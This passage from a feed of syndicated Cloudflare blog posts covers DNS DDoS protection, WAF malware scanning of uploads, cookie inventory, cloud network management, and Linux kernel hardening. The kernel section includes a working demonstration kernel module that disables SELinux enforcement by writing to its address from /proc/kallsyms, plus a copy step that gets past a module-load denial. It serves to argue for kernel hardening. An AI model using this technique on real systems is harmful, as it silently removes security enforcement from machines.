Diagram of Cloudflare’s DDoS protection systems

We’ve also added new DNS-centric data points to help customers better understand their DNS traffic patterns and attacks. These new data points are available in a new “DNS Protection” tab within the Cloudflare Network Analytics dashboard. The new tab provides insights about which DNS queries are passed and dropped, as well as the characteristics of those queries, including the queried domain name and the record type. The analytics can also be fetched by using the Cloudflare GraphQL API and by exporting logs into your own monitoring dashboards via Logpush.

DNS queries: discerning good from bad

To protect against sophisticated and highly randomized DNS-based DDoS attacks, we needed to get better at deciding which DNS queries are likely to be legitimate for our customers. However, it’s not easy to infer what’s legitimate and what’s likely to be a part of an attack just based on the query name. We can’t rely solely on fingerprint-based detection mechanisms, since sometimes seemingly random queries, like abc123.example.com, can be legitimate. The opposite is true as well: a query for mailserver.example.com might look legitimate, but can end up not being a real subdomain for a customer.

To make matters worse, our Layer 3 packet routing-based mitigation service, Magic Transit, uses direct server return (DSR), meaning we can not see the DNS origin server’s responses to give us feedback about which queries are ultimately legitimate.

Diagram of Magic Transit with Direct Server Return (DSR)

We decided that the best way to combat these attacks is to build a data model of each customer’s expected DNS queries, based on a historical record that we build. With this model in hand, we can decide with higher confidence which queries are likely to be legitimate, and drop the ones that we think are not, shielding our customer’s DNS servers.

This is the basis of Advanced DNS Protection. It inspects every DNS query sent to our Magic Transit customers, and passes or drops them based on the data model and each customer’s individual settings.

To do so, each server at our global network continually sends certain DNS-related data such as query type (for example, A record) and the queried domains (but not the source of the query) to our core data centers, where we periodically compute DNS query traffic profiles for each customer. Those profiles are distributed across our global network, where they are consulted to help us more confidently and accurately decide which queries are good and which are bad. We drop the bad queries and pass on the good ones, taking into account a customer’s tolerance for unexpected DNS queries based on their configurations.

Solving the technical challenges that emerged when designing the Advanced DNS Protection system

In building this system, we faced several specific technical challenges:

Data processing

We process tens of millions of DNS queries per day across our global network for our Magic Transit customers, not counting Cloudflare’s suite of other DNS products, and use the DNS-related data mentioned above to build custom query traffic profiles. Analyzing this type of data requires careful treatment of our data pipelines. When building these traffic profiles, we use sample-on-write and adaptive bitrate technologies when writing and reading the necessary data, respectively, to ensure that we capture the data with a fine granularity while protecting our data infrastructure, and we drop information that might impact the privacy of end users.

Compact representation of query data

Some of our customers see tens of millions of DNS queries per day alone. This amount of data would be prohibitively expensive to store and distribute in an uncompressed format. To solve this challenge, we decided to use a counting Bloom filter for each customer’s traffic profile. This is a probabilistic data structure that allows us to succinctly store and distribute each customer’s DNS profile, and then efficiently query it at packet processing time.

Data distribution

We periodically need to recompute and redistribute every customer’s DNS traffic profile between our data centers to each server in our fleet. We used our very own R2 storage service to greatly simplify this task. With regional hints and custom domains enabled, we enabled caching and used only a handful of R2 buckets. Each time we need to update the global view of the customer data models across our edge fleet, 98% of the bits transferred are served from cache.

Built-in tolerance

When new domain names are put into service, our data models will not immediately be aware of them because queries with these names have never been seen before. This and other reasons for potential false positives mandate that we need to build a certain amount of tolerance into the system to allow through potentially legitimate queries. We do so by leveraging token bucket algorithms. Customers can configure the size of the token buckets by changing the sensitivity levels of the Advanced DNS Protection system. The lower the sensitivity, the larger the token bucket — and vice versa. A larger token bucket provides more tolerance for unexpected DNS queries and expected DNS queries that deviate from the profile. A high sensitivity level translates to a smaller token bucket and a stricter approach.

Leveraging Cloudflare’s global software-defined network

At the end of the day, these are the types of challenges that Cloudflare is excellent at solving. Our customers trust us with handling their traffic, and ensuring their Internet properties are protected, available and performant. We take that trust extremely seriously.

The Advanced DNS Protection system leverages our global infrastructure and data processing capabilities alongside intelligent algorithms and data structures to protect our customers.

If you are not yet a Cloudflare customer, let us know if you’d like to protect your DNS servers. Existing Cloudflare customers can enable the new systems by contacting their account team or Cloudflare Support.

General availability for WAF Content Scanning for file malware protection

Post Syndicated from Radwa Radwan original https://blog.cloudflare.com/waf-content-scanning-for-malware-detection


File upload is a common feature in many web applications. Applications may allow users to upload files like images of flood damage to file an insurance claim, PDFs like resumes or cover letters to apply for a job, or other documents like receipts or income statements. However, beneath the convenience lies a potential threat, since allowing unrestricted file uploads can expose the web server and your enterprise network to significant risks related to security, privacy, and compliance.

Cloudflare recently introduced WAF Content Scanning, our in-line malware file detection and prevention solution to stop malicious files from reaching the web server, offering our Enterprise WAF customers an additional line of defense against security threats.

Today, we’re pleased to announce that the feature is now generally available. It will be automatically rolled out to existing WAF Content Scanning customers before the end of March 2024.

In this blog post we will share more details about the new version of the feature, what we have improved, and reveal some of the technical challenges we faced while building it. This feature is available to Enterprise WAF customers as an add-on license, contact your account team to get it.

What to expect from the new version?

The feedback from the early access version has resulted in additional improvements. The main one is expanding the maximum size of scanned files from 1 MB to 15 MB. This change required a complete redesign of the solution’s architecture and implementation. Additionally, we are improving the dashboard visibility and the overall analytics experience.

Let’s quickly review how malware scanning operates within our WAF.

Behind the scenes

WAF Content Scanning operates in a few stages: users activate and configure it, then the scanning engine detects which requests contain files, the files are sent to the scanner returning the scan result fields, and finally users can build custom rules with these fields. We will dig deeper into each step in this section.

Activate and configure

Customers can enable the feature via the API, or through the Settings page in the dashboard (Security → Settings) where a new section has been added for incoming traffic detection configuration and enablement. As soon as this action is taken, the enablement action gets distributed to the Cloudflare network and begins scanning incoming traffic.

Customers can also add a custom configuration depending on the file upload method, such as a base64 encoded file in a JSON string, which allows the specified file to be parsed and scanned automatically.

In the example below, the customer wants us to look at JSON bodies for the key “file” and scan them.

This rule is written using the wirefilter syntax.

Engine runs on traffic and scans the content

As soon as the feature is activated and configured, the scanning engine runs the pre-scanning logic, and identifies content automatically via heuristics. In this case, the engine logic does not rely on the Content-Type header, as it’s easy for attackers to manipulate. When relevant content or a file has been found, the engine connects to the antivirus (AV) scanner in our Zero Trust solution to perform a thorough analysis and return the results of the scan. The engine uses the scan results to propagate useful fields that customers can use.

Integrate with WAF

For every request where a file is found, the scanning engine returns various fields, including:

cf.waf.content_scan.has_malicious_obj,
cf.waf.content_scan.obj_sizes,
cf.waf.content_scan.obj_types, 
cf.waf.content_scan.obj_results

The scanning engine integrates with the WAF where customers can use those fields to create custom WAF rules to address various use cases. The basic use case is primarily blocking malicious files from reaching the web server. However, customers can construct more complex logic, such as enforcing constraints on parameters such as file sizes, file types, endpoints, or specific paths.

In-line scanning limitations and file types

One question that often comes up is about the file types we detect and scan in WAF Content Scanning. Initially, addressing this query posed a challenge since HTTP requests do not have a definition of a “file”, and scanning all incoming HTTP requests does not make sense as it adds extra processing and latency. So, we had to decide on a definition to spot HTTP requests that include files, or as we call it, “uploaded content”.

The WAF Content Scanning engine makes that decision by filtering out certain content types identified by heuristics. Any content types not included in a predefined list, such as text/html, text/x-shellscript, application/json, and text/xml, are considered uploaded content and are sent to the scanner for examination. This allows us to scan a wide range of content types and file types without affecting the performance of all requests by adding extra processing. The wide range of files we scan includes:

  • Executable (e.g., .exe, .bat, .dll, .wasm)
  • Documents (e.g., .doc, .docx, .pdf, .ppt, .xls)
  • Compressed (e.g., .7z, .gz, .zip, .rar)
  • Image (e.g., .jpg, .png, .gif, .webp, .tif)
  • Video and audio files within the 15 MB file size range.

The file size scanning limit of 15 Megabytes comes from the fact that the in-line file scanning as a feature is running in real time, which offers safety to the web server and instant access to clean files, but also impacts the whole request delivery process. Therefore, it’s crucial to scan the payload without causing significant delays or interruptions; namely increased CPU time and latency.

Scaling the scanning process to 15 MB

In the early design of the product, we built a system that could handle requests with a maximum body size of 1 MB, and increasing the limit to 15 MB had to happen without adding any extra latency. As mentioned, this latency is not added to all requests, but only to the requests that have uploaded content. However, increasing the size with the same design would have increased the latency by 15x for those requests.

In this section, we discuss how we previously managed scanning files embedded in JSON request bodies within the former architecture as an example, and why it was challenging to expand the file size using the same design, then compare the same example with the changes made in the new release to overcome the extra latency in details.

Old architecture used for the Early Access release

In order for customers to use the content scanning functionality in scanning files embedded in JSON request bodies, they had to configure a rule like:

lookup_json_string(http.request.body.raw, “file”)

This means we should look in the request body but only for the “file” key, which in the image below contains a base64 encoded string for an image.

When the request hits our Front Line (FL) NGINX proxy, we buffer the request body. This will be in an in-memory buffer, or written to a temporary file if the size of the request body exceeds the NGINX configuration of client_body_buffer_size. Then, our WAF engine executes the lookup_json_string function and returns the base64 string which is the content of the file key. The base64 string gets sent via Unix Domain Sockets to our malware scanner, which does MIME type detection and returns a verdict to the file upload scanning module.

This architecture had a bottleneck that made it hard to expand on: the expensive latency fees we had to pay. The request body is first buffered in NGINX and then copied into our WAF engine, where rules are executed. The malware scanner will then receive the execution result — which, in the worst scenario, is the entire request body — over a Unix domain socket. This indicates that once NGINX buffers the request body, we send and buffer it in two other services.

New architecture for the General Availability release

In the new design, the requirements were to scan larger files (15x larger) while not compromising on performance. To achieve this, we decided to bypass our WAF engine, which is where we introduced the most latency.

In the new architecture, we made the malware scanner aware of what is needed to execute the rule, hence bypassing the Ruleset Engine (RE). For example, the configuration “lookup_json_string(http.request.body.raw, “file”)”, will be represented roughly as:

{
   Function: lookup_json_string
   Args: [“file”]
}

This is achieved by walking the Abstract Syntax Tree (AST) when the rule is configured, and deploying the sample struct above to our global network. The struct’s values will be read by the malware scanner, and rule execution and malware detection will happen within the same service. This means we don’t need to read the request body, execute the rule in the Ruleset Engine (RE) module, and then send the results over to the malware scanner.

The malware scanner will now read the request body from the temporary file directly, perform the rule execution, and return the verdict to the file upload scanning module.

The file upload scanning module populates these fields, so they can be used to write custom rules and take actions. For example:

all(cf.waf.content_scan.obj_results[*] == "clean")

This module also enriches our logging pipelines with these fields, which can then be read in Log Push, Edge Log Delivery, Security Analytics, and Firewall Events in the dashboard. For example, this is the security log in the Cloudflare dashboard (Security → Analytics) for a web request that triggered WAF Content Scanning:

WAF content scanning detection visibility

Using the concept of incoming traffic detection, WAF Content Scanning enables users to identify hidden risks through their traffic signals in the analytics before blocking or mitigating matching requests. This reduces false positives and permits security teams to make decisions based on well-informed data. Actually, this isn’t the only instance in which we apply this idea, as we also do it for a number of other products, like WAF Attack Score and Bot Management.

We have integrated helpful information into our security products, like Security Analytics, to provide this data visibility. The Content Scanning tab, located on the right sidebar, displays traffic patterns even if there were no WAF rules in place. The same data is also reflected in the sampled requests, and you can create new rules from the same view.

On the other hand, if you want to fine-tune your security settings, you will see better visibility in Security Events, where these are the requests that match specific rules you have created in WAF.

Last but not least, in our Logpush datastream, we have included the scan fields that can be selected to send to any external log handler.

What’s next?

Before the end of March 2024, all current and new customers who have enabled WAF Content Scanning will be able to scan uploaded files up to 15 MB. Next, we’ll focus on improving how we handle files in the rules, including adding a dynamic header functionality. Quarantining files is also another important feature we will be adding in the future. If you’re an Enterprise customer, reach out to your account team for more information and to get access.

Collect all your cookies in one jar with Page Shield Cookie Monitor

Post Syndicated from Zhiyuan Zheng original https://blog.cloudflare.com/collect-all-your-cookies-in-one-jar


Cookies are small files of information that a web server generates and sends to a web browser. For example, a cookie stored in your browser will let a website know that you are already logged in, so instead of showing you a login page, you would be taken to your account page welcoming you back.

Though cookies are very useful, they are also used for tracking and advertising, sometimes with repercussions for user privacy. Cookies are a core tool, for example, for all advertising networks. To protect users, privacy laws may require website owners to clearly specify what cookies are being used and for what purposes, and, in many cases, to obtain a user’s consent before storing those cookies in the user’s browser. A key example of this is the ePrivacy Directive.

Herein lies the problem: often website administrators, developers, or compliance team members don’t know what cookies are being used by their website. A common approach for gaining a better understanding of cookie usage is to set up a scanner bot that crawls through each page, collecting cookies along the way. However, many websites requiring authentication or additional security measures do not allow for these scans, or require custom security settings to allow the scanner bot access.

To address these issues, we developed Page Shield Cookie Monitor, which provides a full single dashboard view of all first-party cookies being used by your websites. Over the next few weeks, we are rolling out Page Shield Cookie Monitor to all paid plans, no configuration or scanners required if Page Shield is enabled.

HTTP cookies

HTTP cookies are designed to allow persistence for the stateless HTTP protocol. A basic example of cookie usage is to identify a logged-in user. The browser submits the cookie back to the website whenever you access it again, letting the website know who you are, providing you a customized experience. Cookies are implemented as HTTP headers.

Cookies can be classified as first-party or third-party.

First-party cookies are normally set by the website owner1, and are used to track state against the given website. The logged in example above falls into this category. First party cookies are normally restricted and sent to the given website only and won’t be visible by other sites.

Third-party cookies, on the other hand, are often set by large advertising networks, social networks, or other large organizations that want to track user journeys across the web (across domains). For example, some websites load advertisement objects from a different domain that may set a third-party cookie associated with that advertising network.

Cookies are used for tracking

Growing concerns around user privacy has led browsers to start blocking third-party cookies by default. Led by Firefox and Safari a few years back, Google Chrome, which currently has the largest browser market share, and whose parent company owns Google Ads, the dominant advertising network, started restricting third-party cookies beginning in January of this year.

However, this does not mean the end of tracking users for advertising purposes; the technology has advanced allowing tracking to continue based on first-party cookies. Facebook Pixel, for example, started offering to set first-party cookies alongside third-party cookies in 2018 when being embedded in a website, in order “to be more accurate in measurement and reporting”.

Scanning for cookies?

To inventory all the cookies used when your website is accessed, you can open up any modern browser’s developer console and review which cookie is being set and sent back per HTTP request. However, collecting cookies with this approach won’t be practical unless your website is rather static, containing few external snippets.

Screen capture of Chrome’s developer console listing cookies being set and sent back when visiting a website.

To resolve this, a cookie scanner can be used to automate cookie collection. Depending on your security setup, additional configurations are sometimes required in order to let the scanner bots pass through protection and/or authentication. This may open up a potential attack surface, which isn’t ideal.

Introducing Page Shield Cookie Monitor

With Page Shield enabled, all the first-party cookies, whether set by your website or by external snippets, are collected and displayed in one place, no scanner required. With the click of a button, the full list can be exported in CSV format for further inventory processing.

If you run multiple websites like a marketing website and an admin console that require different cookie strategies, you can simply filter the list based on either domain or path, under the same view. This includes the websites that require authentication such as the admin console.

Dashboard showing a table of cookies seen, including key details such as cookie name, domain and path, and which host set the cookie.

To examine a particular cookie, clicking on its name takes you to a dedicated page that includes all the cookie attributes. Furthermore, similar to Script Monitor and Connection Monitor, we collect the first seen and last seen time and pages for easier tracking of your website’s behavior.

Detailed view of a captured cookie in the dashboard, including all cookie attributes as well as under which host and path this cookie has been set.

Last but not least, we are adding one more alert type specifically for newly seen cookies. When subscribed to this alert, we will notify you through either email or webhook as soon as a new cookie is detected with all the details mentioned above. This allows you to trigger any workflow required, such as inventorying this new cookie for compliance.

How Cookie Monitor works

Let’s imagine you run an e-commerce website example.com. When a user logs in to view their ongoing orders, your website would send a header with key Set-Cookie, and value to identify each user’s login activity:

  • login_id=ABC123; Domain=.example.com

To analyze visitor behaviors, you make use of Google Analytics that requires embedding a code snippet in all web pages. This snippet will set two more cookies after the pages are loaded in the browser:

  • _ga=GA1.2; Domain=.example.com;
  • _ga_ABC=GS1.3; Domain=.example.com;

As these two cookies from Google Analytics are considered first-party given their domain attribute, they are automatically included together with the logged-in cookie sent back to your website. The final cookie sent back for a logged-in user would be Cookie: login_id=ABC123; _ga=GA1.2; _ga_ABC=GS1.3 with three cookies concatenated into one string, even though only one of them is directly consumed by your website.

If your website happens to be proxied through Cloudflare already, we will observe one Set-Cookie header with cookie name of login_id during response, while receiving three cookies back: login_id, _ga, and _ga_ABC. Comparing one cookie set with three returned cookies, the overlapping login_id cookie is then tagged as set by your website directly. The same principle applies to all the requests passing through Cloudflare, allowing us to build an overview of all the first-party cookies used by your websites.

All cookies in one jar

Inventorying all cookies set through using your websites is a first step towards protecting your users’ privacy, and Page Shield makes this step just one click away. Sign up now to be notified when Page Shield Cookie Monitor becomes available!

1Technically, a first-party cookie is a cookie scoped to the given domain only (so not cross domain). Such a cookie can also be set by a third party snippet used by the website to the given domain.

Magic Cloud Networking simplifies security, connectivity, and management of public clouds

Post Syndicated from Steve Welham original https://blog.cloudflare.com/introducing-magic-cloud-networking


Today we are excited to announce Magic Cloud Networking, supercharged by Cloudflare’s recent acquisition of Nefeli Networks’ innovative technology. These new capabilities to visualize and automate cloud networks will give our customers secure, easy, and seamless connection to public cloud environments.

Public clouds offer organizations a scalable and on-demand IT infrastructure without the overhead and expense of running their own datacenter. Cloud networking is foundational to applications that have been migrated to the cloud, but is difficult to manage without automation software, especially when operating at scale across multiple cloud accounts. Magic Cloud Networking uses familiar concepts to provide a single interface that controls and unifies multiple cloud providers’ native network capabilities to create reliable, cost-effective, and secure cloud networks.

Nefeli’s approach to multi-cloud networking solves the problem of building and operating end-to-end networks within and across public clouds, allowing organizations to securely leverage applications spanning any combination of internal and external resources. Adding Nefeli’s technology will make it easier than ever for our customers to connect and protect their users, private networks and applications.

Why is cloud networking difficult?

Compared with a traditional on-premises data center network, cloud networking promises simplicity:

  • Much of the complexity of physical networking is abstracted away from users because the physical and ethernet layers are not part of the network service exposed by the cloud provider.
  • There are fewer control plane protocols; instead, the cloud providers deliver a simplified software-defined network (SDN) that is fully programmable via API.
  • There is capacity — from zero up to very large — available instantly and on-demand, only charging for what you use.

However, that promise has not yet been fully realized. Our customers have described several reasons cloud networking is difficult:

  • Poor end-to-end visibility: Cloud network visibility tools are difficult to use and silos exist even within single cloud providers that impede end-to-end monitoring and troubleshooting.
  • Faster pace: Traditional IT management approaches clash with the promise of the cloud: instant deployment available on-demand. Familiar ClickOps and CLI-driven procedures must be replaced by automation to meet the needs of the business.
  • Different technology: Established network architectures in on-premises environments do not seamlessly transition to a public cloud. The missing ethernet layer and advanced control plane protocols were critical in many network designs.
  • New cost models: The dynamic pay-as-you-go usage-based cost models of the public clouds are not compatible with established approaches built around fixed cost circuits and 5-year depreciation. Network solutions are often architected with financial constraints, and accordingly, different architectural approaches are sensible in the cloud.
  • New security risks: Securing public clouds with true zero trust and least-privilege demands mature operating processes and automation, and familiarity with cloud-specific policies and IAM controls.
  • Multi-vendor: Oftentimes enterprise networks have used single-vendor sourcing to facilitate interoperability, operational efficiency, and targeted hiring and training. Operating a network that extends beyond a single cloud, into other clouds or on-premises environments, is a multi-vendor scenario.

Nefeli considered all these problems and the tensions between different customer perspectives to identify where the problem should be solved.

Trains, planes, and automation

Consider a train system. To operate effectively it has three key layers:

  • tracks and trains
  • electronic signals
  • a company to manage the system and sell tickets.

A train system with good tracks, trains, and signals could still be operating below its full potential because its agents are unable to keep up with passenger demand. The result is that passengers cannot plan itineraries or purchase tickets.

The train company eliminates bottlenecks in process flow by simplifying the schedules, simplifying the pricing, providing agents with better booking systems, and installing automated ticket machines. Now the same fast and reliable infrastructure of tracks, trains, and signals can be used to its full potential.

Solve the right problem

In networking, there are an analogous set of three layers, called the networking planes:

  • Data Plane: the network paths that transport data (in the form of packets) from source to destination.
  • Control Plane: protocols and logic that change how packets are steered across the data plane.
  • Management Plane: the configuration and monitoring interfaces for the data plane and control plane.

In public cloud networks, these layers map to:

  • Cloud Data Plane: The underlying cables and devices are exposed to users as the Virtual Private Cloud (VPC) or Virtual Network (VNet) service that includes subnets, routing tables, security groups/ACLs and additional services such as load-balancers and VPN gateways.
  • Cloud Control Plane: In place of distributed protocols, the cloud control plane is a software defined network (SDN) that, for example, programs static route tables. (There is limited use of traditional control plane protocols, such as BGP to interface with external networks and ARP to interface with VMs.)
  • Cloud Management Plane: An administrative interface with a UI and API which allows the admin to fully configure the data and control planes. It also provides a variety of monitoring and logging capabilities that can be enabled and integrated with 3rd party systems.

Like our train example, most of the problems that our customers experience with cloud networking are in the third layer: the management plane.

Nefeli simplifies, unifies, and automates cloud network management and operations.

Avoid cost and complexity

One common approach to tackle management problems in cloud networks is introducing Virtual Network Functions (VNFs), which are virtual machines (VMs) that do packet forwarding, in place of native cloud data plane constructs. Some VNFs are routers, firewalls, or load-balancers ported from a traditional network vendor’s hardware appliances, while others are software-based proxies often built on open-source projects like NGINX or Envoy. Because VNFs mimic their physical counterparts, IT teams could continue using familiar management tooling, but VNFs have downsides:

  • VMs do not have custom network silicon and so instead rely on raw compute power. The VM is sized for the peak anticipated load and then typically runs 24x7x365. This drives a high cost of compute regardless of the actual utilization.
  • High-availability (HA) relies on fragile, costly, and complex network configuration.
  • Service insertion — the configuration to put a VNF into the packet flow — often forces packet paths that incur additional bandwidth charges.
  • VNFs are typically licensed similarly to their on-premises counterparts and are expensive.
  • VNFs lock in the enterprise and potentially exclude them benefitting from improvements in the cloud’s native data plane offerings.

For these reasons, enterprises are turning away from VNF-based solutions and increasingly looking to rely on the native network capabilities of their cloud service providers. The built-in public cloud networking is elastic, performant, robust, and priced on usage, with high-availability options integrated and backed by the cloud provider’s service level agreement.

In our train example, the tracks and trains are good. Likewise, the cloud network data plane is highly capable. Changing the data plane to solve management plane problems is the wrong approach. To make this work at scale, organizations need a solution that works together with the native network capabilities of cloud service providers.

Nefeli leverages native cloud data plane constructs rather than third party VNFs.

Introducing Magic Cloud Networking

The Nefeli team has joined Cloudflare to integrate cloud network management functionality with Cloudflare One. This capability is called Magic Cloud Networking and with it, enterprises can use the Cloudflare dashboard and API to manage their public cloud networks and connect with Cloudflare One.

End-to-end

Just as train providers are focused only on completing train journeys in their own network, cloud service providers deliver network connectivity and tools within a single cloud account. Many large enterprises have hundreds of cloud accounts across multiple cloud providers. In an end-to-end network this creates disconnected networking silos which introduce operational inefficiencies and risk.

Imagine you are trying to organize a train journey across Europe, and no single train company serves both your origin and destination. You know they all offer the same basic service: a seat on a train. However, your trip is difficult to arrange because it involves multiple trains operated by different companies with their own schedules and ticketing rates, all in different languages!

Magic Cloud Networking is like an online travel agent that aggregates multiple transportation options, books multiple tickets, facilitates changes after booking, and then delivers travel status updates.

Through the Cloudflare dashboard, you can discover all of your network resources across accounts and cloud providers and visualize your end-to-end network in a single interface. Once Magic Cloud Networking discovers your networks, you can build a scalable network through a fully automated and simple workflow.

Resource inventory shows all configuration in a single and responsive UI

Taming per-cloud complexity

Public clouds are used to deliver applications and services. Each cloud provider offers a composable stack of modular building blocks (resources) that start with the foundation of a billing account and then add on security controls. The next foundational layer, for server-based applications, is VPC networking. Additional resources are built on the VPC network foundation until you have compute, storage, and network infrastructure to host the enterprise application and data. Even relatively simple architectures can be composed of hundreds of resources.

The trouble is, these resources expose abstractions that are different from the building blocks you would use to build a service on prem, the abstractions differ between cloud providers, and they form a web of dependencies with complex rules about how configuration changes are made (rules which differ between resource types and cloud providers). For example, say I create 100 VMs, and connect them to an IP network. Can I make changes to the IP network while the VMs are using the network? The answer: it depends.

Magic Cloud Networking handles these differences and complexities for you. It configures native cloud constructs such as VPN gateways, routes, and security groups to securely connect your cloud VPC network to Cloudflare One without having to learn each cloud’s incantations for creating VPN connections and hubs.

Continuous, coordinated automation

Returning to our train system example, what if the railway maintenance staff find a dangerous fault on the railroad track? They manually set the signal to a stop light to prevent any oncoming trains using the faulty section of track. Then, what if, by unfortunate coincidence, the scheduling office is changing the signal schedule, and they set the signals remotely which clears the safety measure made by the maintenance crew? Now there is a problem that no one knows about and the root cause is that multiple authorities can change the signals via different interfaces without coordination.

The same problem exists in cloud networks: configuration changes are made by different teams using different automation and configuration interfaces across a spectrum of roles such as billing, support, security, networking, firewalls, database, and application development.

Once your network is deployed, Magic Cloud Networking monitors its configuration and health, enabling you to be confident that the security and connectivity you put in place yesterday is still in place today. It tracks the cloud resources it is responsible for, automatically reverting drift if they are changed out-of-band, while allowing you to manage other resources, like storage buckets and application servers, with other automation tools. And, as you change your network, Cloudflare takes care of route management, injecting and withdrawing routes globally across Cloudflare and all connected cloud provider networks.

Magic Cloud Networking is fully programmable via API, and can be integrated into existing automation toolchains.

The interface warns when cloud network infrastructure drifts from intent

Ready to start conquering cloud networking?

We are thrilled to introduce Magic Cloud Networking as another pivotal step to fulfilling the promise of the Connectivity Cloud. This marks our initial stride in empowering customers to seamlessly integrate Cloudflare with their public clouds to get securely connected, stay securely connected, and gain flexibility and cost savings as they go.

Join us on this journey for early access: learn more and sign up here.

Linux kernel security tunables everyone should consider adopting

Post Syndicated from Ignat Korchagin original https://blog.cloudflare.com/linux-kernel-hardening

The Linux kernel is the heart of many modern production systems. It decides when any code is allowed to run and which programs/users can access which resources. It manages memory, mediates access to hardware, and does a bulk of work under the hood on behalf of programs running on top. Since the kernel is always involved in any code execution, it is in the best position to protect the system from malicious programs, enforce the desired system security policy, and provide security features for safer production environments.

In this post, we will review some Linux kernel security configurations we use at Cloudflare and how they help to block or minimize a potential system compromise.

Secure boot

When a machine (either a laptop or a server) boots, it goes through several boot stages:

Within a secure boot architecture each stage from the above diagram verifies the integrity of the next stage before passing execution to it, thus forming a so-called secure boot chain. This way “trustworthiness” is extended to every component in the boot chain, because if we verified the code integrity of a particular stage, we can trust this code to verify the integrity of the next stage.

We have previously covered how Cloudflare implements secure boot in the initial stages of the boot process. In this post, we will focus on the Linux kernel.

Secure boot is the cornerstone of any operating system security mechanism. The Linux kernel is the primary enforcer of the operating system security configuration and policy, so we have to be sure that the Linux kernel itself has not been tampered with. In our previous post about secure boot we showed how we use UEFI Secure Boot to ensure the integrity of the Linux kernel.

But what happens next? After the kernel gets executed, it may try to load additional drivers, or as they are called in the Linux world, kernel modules. And kernel module loading is not confined just to the boot process. A module can be loaded at any time during runtime — a new device being plugged in and a driver is needed, some additional extensions in the networking stack are required (for example, for fine-grained firewall rules), or just manually by the system administrator.

However, uncontrolled kernel module loading might pose a significant risk to system integrity. Unlike regular programs, which get executed as user space processes, kernel modules are pieces of code which get injected and executed directly in the Linux kernel address space. There is no separation between the code and data in different kernel modules and core kernel subsystems, so everything can access everything. This means that a rogue kernel module can completely nullify the trustworthiness of the operating system and make secure boot useless. As an example, consider a simple Debian 12 (Bookworm installation), but with SELinux configured and enforced:

ignat@dev:~$ lsb_release --all
No LSB modules are available.
Distributor ID:	Debian
Description:	Debian GNU/Linux 12 (bookworm)
Release:	12
Codename:	bookworm
ignat@dev:~$ uname -a
Linux dev 6.1.0-18-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
ignat@dev:~$ sudo getenforce
Enforcing

Now we need to do some research. First, we see that we’re running 6.1.76 Linux Kernel. If we explore the source code, we would see that inside the kernel, the SELinux configuration is stored in a singleton structure, which is defined as follows:

struct selinux_state {
#ifdef CONFIG_SECURITY_SELINUX_DISABLE
	bool disabled;
#endif
#ifdef CONFIG_SECURITY_SELINUX_DEVELOP
	bool enforcing;
#endif
	bool checkreqprot;
	bool initialized;
	bool policycap[__POLICYDB_CAP_MAX];

	struct page *status_page;
	struct mutex status_lock;

	struct selinux_avc *avc;
	struct selinux_policy __rcu *policy;
	struct mutex policy_mutex;
} __randomize_layout;

From the above, we can see that if the kernel configuration has CONFIG_SECURITY_SELINUX_DEVELOP enabled, the structure would have a boolean variable enforcing, which controls the enforcement status of SELinux at runtime. This is exactly what the above $ sudo getenforce command returns. We can double check that the Debian kernel indeed has the configuration option enabled:

ignat@dev:~$ grep CONFIG_SECURITY_SELINUX_DEVELOP /boot/config-`uname -r`
CONFIG_SECURITY_SELINUX_DEVELOP=y

Good! Now that we have a variable in the kernel, which is responsible for some security enforcement, we can try to attack it. One problem though is the __randomize_layout attribute: since CONFIG_SECURITY_SELINUX_DISABLE is actually not set for our Debian kernel, normally enforcing would be the first member of the struct. Thus if we know where the struct is, we immediately know the position of the enforcing flag. With __randomize_layout, during kernel compilation the compiler might place members at arbitrary positions within the struct, so it is harder to create generic exploits. But arbitrary struct randomization within the kernel may introduce performance impact, so is often disabled and it is disabled for the Debian kernel:

ignat@dev:~$ grep RANDSTRUCT /boot/config-`uname -r`
CONFIG_RANDSTRUCT_NONE=y

We can also confirm the compiled position of the enforcing flag using the pahole tool and either kernel debug symbols, if available, or (on modern kernels, if enabled) in-kernel BTF information. We will use the latter:

ignat@dev:~$ pahole -C selinux_state /sys/kernel/btf/vmlinux
struct selinux_state {
	bool                       enforcing;            /*     0     1 */
	bool                       checkreqprot;         /*     1     1 */
	bool                       initialized;          /*     2     1 */
	bool                       policycap[8];         /*     3     8 */

	/* XXX 5 bytes hole, try to pack */

	struct page *              status_page;          /*    16     8 */
	struct mutex               status_lock;          /*    24    32 */
	struct selinux_avc *       avc;                  /*    56     8 */
	/* --- cacheline 1 boundary (64 bytes) --- */
	struct selinux_policy *    policy;               /*    64     8 */
	struct mutex               policy_mutex;         /*    72    32 */

	/* size: 104, cachelines: 2, members: 9 */
	/* sum members: 99, holes: 1, sum holes: 5 */
	/* last cacheline: 40 bytes */
};

So enforcing is indeed located at the start of the structure and we don’t even have to be a privileged user to confirm this.

Great! All we need is the runtime address of the selinux_state variable inside the kernel:
(shell/bash)

ignat@dev:~$ sudo grep selinux_state /proc/kallsyms
ffffffffbc3bcae0 B selinux_state

With all the information, we can write an almost textbook simple kernel module to manipulate the SELinux state:

Mymod.c:

#include <linux/module.h>

static int __init mod_init(void)
{
	bool *selinux_enforce = (bool *)0xffffffffbc3bcae0;
	*selinux_enforce = false;
	return 0;
}

static void mod_fini(void)
{
}

module_init(mod_init);
module_exit(mod_fini);

MODULE_DESCRIPTION("A somewhat malicious module");
MODULE_AUTHOR("Ignat Korchagin <[email protected]>");
MODULE_LICENSE("GPL");

And the respective Kbuild file:

obj-m := mymod.o

With these two files we can build a full fledged kernel module according to the official kernel docs:

ignat@dev:~$ cd mymod/
ignat@dev:~/mymod$ ls
Kbuild  mymod.c
ignat@dev:~/mymod$ make -C /lib/modules/`uname -r`/build M=$PWD
make: Entering directory '/usr/src/linux-headers-6.1.0-18-cloud-amd64'
  CC [M]  /home/ignat/mymod/mymod.o
  MODPOST /home/ignat/mymod/Module.symvers
  CC [M]  /home/ignat/mymod/mymod.mod.o
  LD [M]  /home/ignat/mymod/mymod.ko
  BTF [M] /home/ignat/mymod/mymod.ko
Skipping BTF generation for /home/ignat/mymod/mymod.ko due to unavailability of vmlinux
make: Leaving directory '/usr/src/linux-headers-6.1.0-18-cloud-amd64'

If we try to load this module now, the system may not allow it due to the SELinux policy:

ignat@dev:~/mymod$ sudo insmod mymod.ko
insmod: ERROR: could not load module mymod.ko: Permission denied

We can workaround it by copying the module into the standard module path somewhere:

ignat@dev:~/mymod$ sudo cp mymod.ko /lib/modules/`uname -r`/kernel/crypto/

Now let’s try it out:

ignat@dev:~/mymod$ sudo getenforce
Enforcing
